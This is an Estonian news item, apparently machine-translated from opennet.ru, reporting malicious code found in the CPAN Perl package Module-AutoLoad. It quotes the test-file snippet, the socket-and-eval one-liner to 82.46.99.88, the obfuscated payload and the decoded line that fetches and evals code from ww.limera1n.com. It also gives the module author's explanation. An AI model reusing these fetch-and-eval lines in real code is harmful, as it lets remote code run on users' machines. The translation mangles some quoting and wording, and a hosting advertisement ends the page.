Perl-pakett Module-AutoLoad sisaldab pahavara koodi

CPAN Perl-paketi, mis levitatakse kaudu Module-AutoLoad, mis on mÔeldud CPAN-moodulite automaatseks laadimiseks reaalajas, avastatud kahjulik kood. Kahjulik kood oli leitud testikoodist 05_rcx.t, mis on saadaval alates 2011. aastast.
Oluline on mainida, et kĂŒsimused kahtlase koodi laadimise kohta tekkisid Stackoverflowis juba 2016. aastal.

Kahjulik tegevus seisneb katses laadida ja kĂ€ivitada koodi kolmandalt serverilt (http://r.cx:1/) testkomplekti kĂ€itamise ajal, mis toimub mooduli installimise kĂ€igus. Eeldatakse, et algselt kolmandalt serverilt laaditud kood ei olnud kahjulik, kuid nĂŒĂŒd suunatakse pĂ€ringule domeenile ww.limera1n.com, misedastab oma koodi tĂ€itmiseks.

Laadimise korraldamiseks kasutatakse failis 05_rcx.t jÀrgmist koodi:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Antud kood kÀivitab skripti ../contrib/RCX.pl, mille sisu on jÀrgmine:

use lib do{eval&&botstrap(«RCX»)if$b=new IO::Socket::INET 82.46.99.88.»:1″};

See skript laadib peidetud kasutades teenust perlobfuscator.com koodi vÀlisest hostist r.cx (aadressid 82.46.99.88 vastavad tekstile «R.cX») ja tÀidab selle eval plokis.

$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.»:1″; print ;’
eval unpack u=>q{_<'I;G1[)&(];F5W($E/.CI3;V-K970Z.DE
.}

PÀrast dekompressiooni tÀidetakse koodi:

print{$b=new IO::Socket::INET»ww.limera1n.com:80″}»GET /iJailBreak
«;evalor return warn$@while$b;1

Praegu on probleemne paket eemaldatud hoidlalt PAUSE (Perl Authors Upload Server), ja mooduli autori konto on blokeeritud. Samas jÀÀb moodul saadaval MetaCPAN arhiivi ja seda saab otse installida MetaCPANist kasutades mÔningaid utiliite, nagu cpanminus. On mÀrgitud, nii et pakett ei olnud laialdaselt levitatud.

Huvitav, et arutelu liitus ja mooduli autor, kes lĂŒkkas ĂŒmber vĂ€ite, et kahjulik kood lisati pĂ€rast oma veebisaidi «r.cx» hĂ€kkimist, ning selgitas, et ta lihtsalt lĂ”butses ning perlobfuscator.com kasutas mitte peitmmiseks, vaid koodi suuruse vĂ€hendamiseks ja kopeerimise lihtsustamiseks lĂ”ikelauale. Funktsiooni «botstrap» valik on selgitatud, et see sĂ”na „kĂ”lab nagu bot ja on lĂŒhem kui bootstrap”. Mooduli autor kinnitas ka, et tuvastatud manipulatsioonid ei tee kahjulikke toiminguid, vaid demonstreerivad koodi laadimist ja kĂ€ivitamist TCP ĂŒle.

Allikas: opennet.ru

Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster